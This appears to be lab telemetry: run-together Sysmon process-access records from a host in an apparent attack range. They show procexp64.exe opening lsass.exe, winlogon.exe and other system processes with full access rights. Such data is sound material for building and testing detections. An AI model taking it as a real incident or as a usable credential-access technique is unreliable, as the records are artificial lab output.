15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:03.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 